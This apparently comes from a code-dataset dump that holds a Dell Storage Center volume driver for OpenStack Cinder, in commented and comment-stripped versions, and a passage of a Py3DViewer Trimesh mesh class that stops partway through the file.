hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72333a6d2c63ba5422144f77ace3843512c1078 | 14,661 | py | Python | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.dell import dell_storagecenter_api
from cinder.volume.drivers.san import san
common_opts = [
cfg.IntOpt('dell_sc_ssn',
default=64702,
help='Storage Center System Serial Number'),
cfg.IntOpt('dell_sc_api_port',
default=3033,
help='Dell API port'),
cfg.StrOpt('dell_sc_server_folder',
default='openstack',
help='Name of the server folder to use on the Storage Center'),
cfg.StrOpt('dell_sc_volume_folder',
default='openstack',
help='Name of the volume folder to use on the Storage Center')
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(common_opts)
class DellCommonDriver(san.SanDriver):
    '''Common driver logic shared by the Dell Storage Center drivers.

    Wraps the StorageCenterApiHelper REST client and implements the
    volume/snapshot lifecycle operations shared by the protocol
    specific (iSCSI/FC) subclasses.
    '''

    def __init__(self, *args, **kwargs):
        super(DellCommonDriver, self).__init__(*args, **kwargs)
        self.configuration.append_config_values(common_opts)
        self.backend_name =\
            self.configuration.safe_get('volume_backend_name') or 'Dell'

    def _bytes_to_gb(self, spacestring):
        '''Space is returned in a string like ...
        7.38197504E8 Bytes
        Need to split that apart and convert to GB.

        returns gbs in int form
        '''
        try:
            n = spacestring.split(' ', 1)
            fgbs = float(n[0]) / 1073741824.0
            igbs = int(fgbs)
            return igbs
        except Exception:
            # If any of that blew up it isn't in the format we
            # thought so eat our error and return None
            return None

    def do_setup(self, context):
        '''One time driver setup.

        Called once by the manager after the driver is loaded.
        Sets up clients, check licenses, sets up protocol
        specific helpers.
        '''
        self._client = dell_storagecenter_api.StorageCenterApiHelper(
            self.configuration)

    def check_for_setup_error(self):
        '''Validates the configuration information.'''
        with self._client.open_connection() as api:
            ssn = self.configuration.safe_get('dell_sc_ssn')
            api.find_sc(ssn)

    def create_volume(self, volume):
        '''Create a volume.

        :param volume: cinder volume dict; ``id`` is used as the SC
                       volume name, ``size`` as the size in GB.
        :raises VolumeBackendAPIException: if the volume was not created.
        '''
        # We use the id as our name as it is unique.
        volume_name = volume.get('id')
        volume_size = volume.get('size')
        LOG.debug('Creating volume %(name)s of size %(size)s',
                  {'name': volume_name, 'size': volume_size})
        scvolume = None
        with self._client.open_connection() as api:
            try:
                volume_folder = self.configuration.dell_sc_volume_folder
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                LOG.debug('create_volume: %(name)s on %(ssn)s in %(vf)s',
                          {'name': volume_name,
                           'ssn': ssn,
                           'vf': volume_folder})
                if ssn is not None:
                    scvolume = api.create_volume(volume_name,
                                                 volume_size,
                                                 ssn,
                                                 volume_folder)
            except Exception:
                with excutils.save_and_reraise_exception():
                    # BUG FIX: log the same identifier used everywhere
                    # else in this driver (volume id), not volume['name'].
                    LOG.error(_LE('Failed to create volume %s'),
                              volume_name)
        if scvolume is None:
            raise exception.VolumeBackendAPIException(
                _('Unable to create volume'))

    def delete_volume(self, volume):
        '''Delete a volume.

        :raises VolumeIsBusy: if the backend refused the delete.
        '''
        deleted = False
        # we use id as our name as it s unique
        volume_name = volume.get('id')
        LOG.debug('Deleting volume %s', volume_name)
        with self._client.open_connection() as api:
            try:
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                if ssn is not None:
                    deleted = api.delete_volume(ssn,
                                                volume_name)
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE('Failed to delete volume %s'),
                              volume_name)

        # if there was an error we will have raised an
        # exception.  If it failed to delete it is because
        # the conditions to delete a volume were not met.
        if deleted is False:
            raise exception.VolumeIsBusy(volume_name=volume_name)

    def create_snapshot(self, snapshot):
        '''Create snapshot (a Storage Center "replay").'''
        # our volume name is the volume id
        volume_name = snapshot.get('volume_id')
        snapshot_id = snapshot.get('id')
        LOG.debug('Creating snapshot %(snap)s on volume %(vol)s',
                  {'snap': snapshot_id, 'vol': volume_name})
        with self._client.open_connection() as api:
            ssn = api.find_sc(self.configuration.dell_sc_ssn)
            if ssn is not None:
                scvolume = api.find_volume(ssn,
                                           volume_name)
                if scvolume is not None:
                    # 0 == do not expire the replay automatically.
                    if api.create_replay(scvolume,
                                         snapshot_id,
                                         0) is not None:
                        snapshot['status'] = 'available'
                        return
                else:
                    LOG.warning(_LW('Unable to locate volume:%s'),
                                volume_name)

        snapshot['status'] = 'error_creating'
        raise exception.VolumeBackendAPIException(
            _('Failed to create snapshot %s') %
            snapshot_id)

    def create_volume_from_snapshot(self, volume, snapshot):
        '''Create new volume from other volume's snapshot on appliance.'''
        scvolume = None
        src_volume_name = snapshot.get('volume_id')
        snapshot_id = snapshot.get('id')
        volume_name = volume.get('id')
        LOG.debug(
            'Creating new volume %(vol)s from snapshot %(snap)s '
            'from vol %(src)s',
            {'vol': volume_name,
             'snap': snapshot_id,
             'src': src_volume_name})
        with self._client.open_connection() as api:
            try:
                volume_folder = self.configuration.dell_sc_volume_folder
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                srcvol = api.find_volume(ssn,
                                         src_volume_name)
                if srcvol is not None:
                    replay = api.find_replay(srcvol,
                                             snapshot_id)
                    if replay is not None:
                        volume_name = volume.get('id')
                        # A "view volume" is the SC mechanism for a
                        # writable volume backed by a replay.
                        scvolume = api.create_view_volume(volume_name,
                                                          volume_folder,
                                                          replay)
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE('Failed to create volume %s'),
                              volume_name)
        if scvolume is not None:
            LOG.debug('Volume %(n)s created from %(s)s',
                      {'n': volume_name,
                       's': snapshot_id})
        else:
            raise exception.VolumeBackendAPIException(
                _('Failed to create volume %s') % volume_name)

    def create_cloned_volume(self, volume, src_vref):
        '''Creates a clone of the specified volume.'''
        scvolume = None
        src_volume_name = src_vref.get('id')
        volume_name = volume.get('id')
        LOG.debug('Creating cloned volume %(clone)s from volume %(vol)s',
                  {'clone': volume_name,
                   'vol': src_volume_name})
        with self._client.open_connection() as api:
            try:
                volume_folder = self.configuration.dell_sc_volume_folder
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                srcvol = api.find_volume(ssn,
                                         src_volume_name)
                if srcvol is not None:
                    scvolume = api.create_cloned_volume(volume_name,
                                                        volume_folder,
                                                        srcvol)
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE('Failed to create volume %s'),
                              volume_name)
        if scvolume is not None:
            LOG.debug('Volume %(n)s cloned from %(s)s',
                      {'n': volume_name,
                       's': src_volume_name})
        else:
            raise exception.VolumeBackendAPIException(
                _('Failed to create volume %s') % volume_name)

    def delete_snapshot(self, snapshot):
        '''delete_snapshot

        Deletes the replay backing the snapshot; raises if the volume
        or replay cannot be found or the delete fails.
        '''
        volume_name = snapshot.get('volume_id')
        snapshot_id = snapshot.get('id')
        LOG.debug('Deleting snapshot %(snap)s from volume %(vol)s',
                  {'snap': snapshot_id,
                   'vol': volume_name})
        with self._client.open_connection() as api:
            ssn = api.find_sc(self.configuration.dell_sc_ssn)
            if ssn is not None:
                scvolume = api.find_volume(ssn,
                                           volume_name)
                if scvolume is not None:
                    if api.delete_replay(scvolume,
                                         snapshot_id):
                        return
        # if we are here things went poorly.
        snapshot['status'] = 'error_deleting'
        raise exception.VolumeBackendAPIException(
            _('Failed to delete snapshot %s') % snapshot_id)

    def create_export(self, context, volume):
        '''Create an export of a volume.

        The volume exists on creation and will be visible on
        initialize connection.  So nothing to do here.
        '''
        pass

    def ensure_export(self, context, volume):
        '''Ensure an export of a volume.

        Per the eqlx driver we just make sure that the volume actually
        exists where we think it does.
        '''
        scvolume = None
        volume_name = volume.get('id')
        LOG.debug('Checking existence of volume %s', volume_name)
        with self._client.open_connection() as api:
            try:
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                if ssn is not None:
                    scvolume = api.find_volume(ssn,
                                               volume_name)
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE('Failed to ensure export of volume %s'),
                              volume_name)
        if scvolume is None:
            raise exception.VolumeBackendAPIException(
                _('unable to find volume %s') % volume_name)

    def remove_export(self, context, volume):
        '''Remove an export of a volume.

        We do nothing here to match the nothing we do in create export.  Again
        we do everything in initialize and terminate connection.
        '''
        pass

    def extend_volume(self, volume, new_size):
        '''Extend the size of the volume.'''
        volume_name = volume.get('id')
        LOG.debug('Extending volume %(vol)s to %(size)s',
                  {'vol': volume_name, 'size': new_size})
        if volume is not None:
            with self._client.open_connection() as api:
                ssn = api.find_sc(self.configuration.dell_sc_ssn)
                if ssn is not None:
                    scvolume = api.find_volume(ssn,
                                               volume_name)
                    if api.expand_volume(scvolume, new_size) is not None:
                        return
        # If we are here nothing good happened.
        raise exception.VolumeBackendAPIException(
            _('Unable to extend volume %s') % volume_name)

    def get_volume_stats(self, refresh=False):
        '''Get volume status.

        If 'refresh' is True, run update the stats first.
        '''
        if refresh:
            self._update_volume_stats()
        return self._stats

    def _update_volume_stats(self):
        '''Retrieve stats info from volume group.'''
        with self._client.open_connection() as api:
            ssn = api.find_sc(self.configuration.dell_sc_ssn)
            storageusage = api.get_storage_usage(ssn)

            # all of this is basically static for now
            data = {}
            data['volume_backend_name'] = self.backend_name
            data['vendor_name'] = 'Dell'
            data['driver_version'] = self.VERSION
            data['storage_protocol'] = 'iSCSI'
            data['reserved_percentage'] = 0
            # BUG FIX: initialize these so the LOG.debug below does not
            # raise NameError when storageusage is None.
            totalcapacitygb = None
            freespacegb = None
            # in theory if storageusage is None then we should have
            # blown up getting it.  If not just report inifinite.
            if storageusage is not None:
                totalcapacity = storageusage.get('availableSpace')
                totalcapacitygb = self._bytes_to_gb(totalcapacity)
                data['total_capacity_gb'] = totalcapacitygb
                freespace = storageusage.get('freeSpace')
                freespacegb = self._bytes_to_gb(freespace)
                data['free_capacity_gb'] = freespacegb
            if data.get('total_capacity_gb') is None:
                data['total_capacity_gb'] = 'unavailable'
            if data.get('free_capacity_gb') is None:
                data['free_capacity_gb'] = 'unavailable'
            data['QoS_support'] = False
            self._stats = data
            LOG.debug('Total cap %(t)s Free cap %(f)s',
                      {'t': totalcapacitygb,
                       'f': freespacegb})
| 41.769231 | 78 | 0.544506 |
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.dell import dell_storagecenter_api
from cinder.volume.drivers.san import san
common_opts = [
cfg.IntOpt('dell_sc_ssn',
default=64702,
help='Storage Center System Serial Number'),
cfg.IntOpt('dell_sc_api_port',
default=3033,
help='Dell API port'),
cfg.StrOpt('dell_sc_server_folder',
default='openstack',
help='Name of the server folder to use on the Storage Center'),
cfg.StrOpt('dell_sc_volume_folder',
default='openstack',
help='Name of the volume folder to use on the Storage Center')
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(common_opts)
class DellCommonDriver(san.SanDriver):
def __init__(self, *args, **kwargs):
super(DellCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(common_opts)
self.backend_name =\
self.configuration.safe_get('volume_backend_name') or 'Dell'
def _bytes_to_gb(self, spacestring):
try:
n = spacestring.split(' ', 1)
fgbs = float(n[0]) / 1073741824.0
igbs = int(fgbs)
return igbs
except Exception:
# thought so eat our error and return None
return None
def do_setup(self, context):
self._client = dell_storagecenter_api.StorageCenterApiHelper(
self.configuration)
def check_for_setup_error(self):
with self._client.open_connection() as api:
ssn = self.configuration.safe_get('dell_sc_ssn')
api.find_sc(ssn)
def create_volume(self, volume):
volume_name = volume.get('id')
volume_size = volume.get('size')
LOG.debug('Creating volume %(name)s of size %(size)s',
{'name': volume_name, 'size': volume_size})
scvolume = None
with self._client.open_connection() as api:
try:
# we use id as our name as it s unique
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
LOG.debug('create_volume: %(name)s on %(ssn)s in %(vf)s',
{'name': volume_name,
'ssn': ssn,
'vf': volume_folder})
if ssn is not None:
scvolume = api.create_volume(volume_name,
volume_size,
ssn,
volume_folder)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume['name'])
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('Unable to create volume'))
def delete_volume(self, volume):
deleted = False
# we use id as our name as it s unique
volume_name = volume.get('id')
LOG.debug('Deleting volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
deleted = api.delete_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to delete volume %s'),
volume_name)
# if there was an error we will have raised an
# exception. If it failed to delete it is because
# the conditions to delete a volume were not met.
if deleted is False:
raise exception.VolumeIsBusy(volume_name=volume_name)
def create_snapshot(self, snapshot):
# our volume name is the volume id
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Creating snapshot %(snap)s on volume %(vol)s',
{'snap': snapshot_id, 'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.create_replay(scvolume,
snapshot_id,
0) is not None:
snapshot['status'] = 'available'
return
else:
LOG.warning(_LW('Unable to locate volume:%s'),
volume_name)
snapshot['status'] = 'error_creating'
raise exception.VolumeBackendAPIException(
_('Failed to create snapshot %s') %
snapshot_id)
def create_volume_from_snapshot(self, volume, snapshot):
scvolume = None
src_volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
volume_name = volume.get('id')
LOG.debug(
'Creating new volume %(vol)s from snapshot %(snap)s '
'from vol %(src)s',
{'vol': volume_name,
'snap': snapshot_id,
'src': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
replay = api.find_replay(srcvol,
snapshot_id)
if replay is not None:
volume_name = volume.get('id')
scvolume = api.create_view_volume(volume_name,
volume_folder,
replay)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s created from %(s)s',
{'n': volume_name,
's': snapshot_id})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def create_cloned_volume(self, volume, src_vref):
scvolume = None
src_volume_name = src_vref.get('id')
volume_name = volume.get('id')
LOG.debug('Creating cloned volume %(clone)s from volume %(vol)s',
{'clone': volume_name,
'vol': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
scvolume = api.create_cloned_volume(volume_name,
volume_folder,
srcvol)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s cloned from %(s)s',
{'n': volume_name,
's': src_volume_name})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def delete_snapshot(self, snapshot):
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Deleting snapshot %(snap)s from volume %(vol)s',
{'snap': snapshot_id,
'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.delete_replay(scvolume,
snapshot_id):
return
# if we are here things went poorly.
snapshot['status'] = 'error_deleting'
raise exception.VolumeBackendAPIException(
_('Failed to delete snapshot %s') % snapshot_id)
def create_export(self, context, volume):
pass
def ensure_export(self, context, volume):
scvolume = None
volume_name = volume.get('id')
LOG.debug('Checking existence of volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to ensure export of volume %s'),
volume_name)
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('unable to find volume %s') % volume_name)
def remove_export(self, context, volume):
pass
def extend_volume(self, volume, new_size):
volume_name = volume.get('id')
LOG.debug('Extending volume %(vol)s to %(size)s',
{'vol': volume_name, 'size': new_size})
if volume is not None:
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if api.expand_volume(scvolume, new_size) is not None:
return
# If we are here nothing good happened.
raise exception.VolumeBackendAPIException(
_('Unable to extend volume %s') % volume_name)
def get_volume_stats(self, refresh=False):
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
storageusage = api.get_storage_usage(ssn)
# all of this is basically static for now
data = {}
data['volume_backend_name'] = self.backend_name
data['vendor_name'] = 'Dell'
data['driver_version'] = self.VERSION
data['storage_protocol'] = 'iSCSI'
data['reserved_percentage'] = 0
# in theory if storageusage is None then we should have
# blown up getting it. If not just report inifinite.
if storageusage is not None:
totalcapacity = storageusage.get('availableSpace')
totalcapacitygb = self._bytes_to_gb(totalcapacity)
data['total_capacity_gb'] = totalcapacitygb
freespace = storageusage.get('freeSpace')
freespacegb = self._bytes_to_gb(freespace)
data['free_capacity_gb'] = freespacegb
if data.get('total_capacity_gb') is None:
data['total_capacity_gb'] = 'unavailable'
if data.get('free_capacity_gb') is None:
data['free_capacity_gb'] = 'unavailable'
data['QoS_support'] = False
self._stats = data
LOG.debug('Total cap %(t)s Free cap %(f)s',
{'t': totalcapacitygb,
'f': freespacegb})
| true | true |
f72333deff8a4bcf9a7c6709c2fa3551310f9ff5 | 12,891 | py | Python | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | from .Abstractmesh import AbstractMesh
import numpy as np
from ..utils import IO, ObservableArray, deprecated, utilities
from ..utils.load_operations import get_connectivity_info_surface as get_connectivity_info
from ..utils.load_operations import compute_vertex_normals, compute_face_normals
from ..utils.load_operations import _compute_three_vertex_normals as compute_three_normals
from ..utils.metrics import triangle_aspect_ratio, triangle_area
class Trimesh(AbstractMesh):
    """
    This class represents a mesh composed of triangles. It is possible to load the mesh from a file or
    from raw geometry and topology data.

    Parameters:

        filename (string): The name of the file to load
        vertices (Array (Nx3) type=float): The list of vertices of the mesh
        polys (Array (Nx3) type=int): The list of polygons of the mesh
        labels (Array (Nx1) type=int): The list of labels of the mesh (Optional)

    """

    def __init__(self, filename=None, vertices=None, polys=None, labels=None, texture=None, mtl=None, smoothness=False):

        super(Trimesh, self).__init__()

        self.vtx_normals = None  # npArray (Nx3)
        self.poly_normals = None  # npArray (Nx3)
        self.texture = texture
        self.material = {}
        self.groups = {}
        self.smoothness = smoothness
        self.__map_poly_indices = []

        if mtl is not None:
            self.__load_from_file(mtl)

        if filename is not None:
            self.__load_from_file(filename)
            self._AbstractMesh__filename = filename.split('/')[-1]

        elif vertices is not None and polys is not None:
            vertices = np.array(vertices)
            polys = np.array(polys)
            self.vertices = ObservableArray(vertices.shape)
            self.vertices[:] = vertices
            self.vertices.attach(self)
            self._AbstractMesh__polys = ObservableArray(polys.shape, dtype=np.int64)
            self._AbstractMesh__polys[:] = polys
            self._AbstractMesh__polys.attach(self)
            self.__load_operations()

            if labels is not None:
                labels = np.array(labels)
                assert(labels.shape[0] == polys.shape[0])
                # builtin int replaces the np.int alias removed in NumPy >= 1.24
                self.labels = ObservableArray(labels.shape, dtype=int)
                self.labels[:] = labels
                self.labels.attach(self)
            else:
                self.labels = ObservableArray(polys.shape[0], dtype=int)
                self.labels[:] = np.zeros(self.labels.shape, dtype=int)
                self.labels.attach(self)

        self._AbstractMesh__poly_size = 3
        self._AbstractMesh__finished_loading = True

    # ==================== METHODS ==================== #

    def __load_operations(self):
        """Rebuild connectivity, normals, metrics and bounds after any
        geometry/topology change."""
        self._dont_update = True
        self._AbstractMesh__boundary_needs_update = True
        self._AbstractMesh__simplex_centroids = None
        self._AbstractMesh__edges, \
        self._AbstractMesh__adj_vtx2vtx, \
        self._AbstractMesh__adj_vtx2edge, \
        self._AbstractMesh__adj_vtx2poly, \
        self._AbstractMesh__adj_edge2vtx, \
        self._AbstractMesh__adj_edge2edge, \
        self._AbstractMesh__adj_edge2poly, \
        self._AbstractMesh__adj_poly2vtx, \
        self._AbstractMesh__adj_poly2edge, \
        self._AbstractMesh__adj_poly2poly = get_connectivity_info(self.num_vertices, self.polys)
        self._AbstractMesh__update_bounding_box()
        self.reset_clipping()
        self.poly_normals = compute_face_normals(self.vertices, self.polys)
        self.vtx_normals = compute_vertex_normals(self.poly_normals, self.adj_vtx2poly._NList__list)
        self.__compute_metrics()
        self._AbstractMesh__simplex_centroids = None
        self._dont_update = False
        self.update()

    def __load_from_file(self, filename):
        """Load vertices/polys (and labels for .mesh) from an .obj, .off,
        .mesh or .mtl file."""
        ext = filename.split('.')[-1]

        if ext == 'obj':
            self.vertices, self._AbstractMesh__polys, self.poly_normals, self.uvcoords, self.coor, self.groups = IO.read_obj(filename)
            # self.vertices, self.faces, self.face_normals = IO.read_obj(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
            self.poly_normals.attach(self)
            self.uvcoords.attach(self)
            self.coor.attach(self)
        elif ext == 'mtl':
            self.material = IO.read_mtl(filename)
            return
        elif ext == 'off':
            self.vertices, self._AbstractMesh__polys = IO.read_off(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
        elif ext == 'mesh':
            self.vertices, self._AbstractMesh__polys, labels = IO.read_mesh(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
        else:
            raise Exception("Only .obj, .off and .mesh files are supported")

        self.labels = ObservableArray(self.num_polys, dtype=int)
        self.labels[:] = np.zeros(self.labels.shape, dtype=int) if ext != 'mesh' else labels
        self.labels.attach(self)

        self.__load_operations()

        return self

    def save_file(self, filename):
        """
        Save the current mesh in a file. Currently it supports the .obj extension.

        Parameters:

            filename (string): The name of the file

        """
        ext = filename.split('.')[-1]

        if ext == 'obj':
            IO.save_obj(self, filename)
        elif ext == 'off':
            IO.save_off(self, filename)
        elif ext == 'mesh':
            IO.save_mesh(self, filename)
        else:
            raise Exception("Only .obj, .off and .mesh files are supported")

    def __compute_metrics(self):
        # Per-triangle quality metrics, keyed by name.
        self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
        self.simplex_metrics['aspect_ratio'] = triangle_aspect_ratio(self.vertices, self.polys)

    def update_metrics(self):
        """Recompute the per-triangle metrics (area, aspect ratio)."""
        self.__compute_metrics()

    @property
    def _map_poly_indices(self):
        return self.__map_poly_indices

    def boundary(self):
        """
        Compute the boundary of the current mesh. It only returns the faces that are inside the clipping
        """
        if (self._AbstractMesh__boundary_needs_update):
            clipping_range = super(Trimesh, self).boundary()
            self._AbstractMesh__visible_polys = clipping_range
            self._AbstractMesh__boundary_cached = clipping_range
            self._AbstractMesh__boundary_needs_update = False
            self.__map_poly_indices = []
            counter = 0
            # NOTE(review): for each visible poly this records the number of
            # clipped polys seen so far — presumably an offset map from
            # visible index back to original index; confirm against callers.
            for c in clipping_range:
                if c:
                    self.__map_poly_indices.append(counter)
                else:
                    counter = counter + 1
        return self.polys[self._AbstractMesh__boundary_cached], self._AbstractMesh__boundary_cached

    def as_edges_flat(self):
        """Return the edges of the visible (clipped-in) faces as a flat
        vertex-index array (two indices per edge)."""
        # Faces inside the bounding box
        boundaries = self.boundary()[0]
        # Insert into a vertical array all the correspondences between all the vertices collapsed in one dimension
        edges = np.c_[boundaries[:, :2], boundaries[:, 1:], boundaries[:, 2], boundaries[:, 0]].flatten()
        # edges_flat = self.vertices[edges].tolist()
        return edges

    def _as_threejs_triangle_soup(self):
        # Duplicate vertices per triangle (soup) for flat-shaded rendering.
        tris = self.vertices[self.boundary()[0].flatten()]
        return tris.astype(np.float32), compute_three_normals(tris).astype(np.float32)

    def as_triangles(self):
        """Return the visible triangles as a flat uint32 index array."""
        return self.boundary()[0].flatten().astype("uint32")

    def _as_threejs_colors(self, colors=None):
        # One color entry per triangle corner (3 per face).
        if colors is not None:
            return np.repeat(colors, 3, axis=0)
        return np.repeat(self.boundary()[1], 3)

    @property
    def num_triangles(self):
        return self.num_polys

    def vertex_remove(self, vtx_id):
        """
        Remove a vertex from the current mesh. It affects the mesh geometry.

        Parameters:

            vtx_id (int): The index of the vertex to remove

        """
        self.vertices_remove([vtx_id])

    def vertices_remove(self, vtx_ids):
        """
        Remove a list of vertices from the current mesh. It affects the mesh geometry.

        Parameters:

            vtx_ids (Array (Nx1 / 1xN) type=int): List of vertices to remove. Each vertex is in the form [int]

        """
        self._dont_update = True
        vtx_ids = np.array(vtx_ids)

        for v_id in vtx_ids:

            self.vertices = np.delete(self.vertices, v_id, 0)
            # Drop every face incident to the removed vertex.
            condition = ((self._AbstractMesh__polys[:, 0] != v_id) &
                         (self._AbstractMesh__polys[:, 1] != v_id) &
                         (self._AbstractMesh__polys[:, 2] != v_id))

            if self.labels is not None:
                self.labels = self.labels[condition]

            self._AbstractMesh__polys = self._AbstractMesh__polys[condition]

            # Reindex: every vertex index above the removed one shifts down by 1.
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 0] > v_id)] -= np.array([1, 0, 0])
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 1] > v_id)] -= np.array([0, 1, 0])
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 2] > v_id)] -= np.array([0, 0, 1])

            # Keep the pending ids consistent with the reindexed vertices.
            vtx_ids[vtx_ids > v_id] -= 1

        self.__load_operations()

    def poly_add(self, new_poly):
        """
        Add a new face to the current mesh. It affects the mesh topology.

        Parameters:

            new_poly (Array (Nx1) type=int): Poly to add in the form [int, ..., int]

        """
        self.polys_add(new_poly)

    def polys_add(self, new_polys):
        """
        Add a list of new faces to the current mesh. It affects the mesh topology.

        Parameters:

            new_polys (Array (NxM) type=int): List of faces to add. Each face is in the form [int, ..., int]

        """
        AbstractMesh.polys_add(self, new_polys)
        self.__load_operations()

    def poly_remove(self, poly_id):
        """
        Remove a poly from the current mesh. It affects the mesh topology.

        Parameters:

            poly_id (int): The index of the face to remove

        """
        self.polys_remove([poly_id])

    def polys_remove(self, poly_ids):
        """
        Remove a list of polys from the current mesh. It affects the mesh topology.

        Parameters:

            poly_ids (Array (Nx1 / 1xN) type=int): List of polys to remove. Each face is in the form [int]

        """
        AbstractMesh.polys_remove(self, poly_ids)
        self.__load_operations()

    def tessellate(self):
        # Triangles are already simplices; nothing to tessellate.
        return self.polys

    @property
    def edge_is_manifold(self):
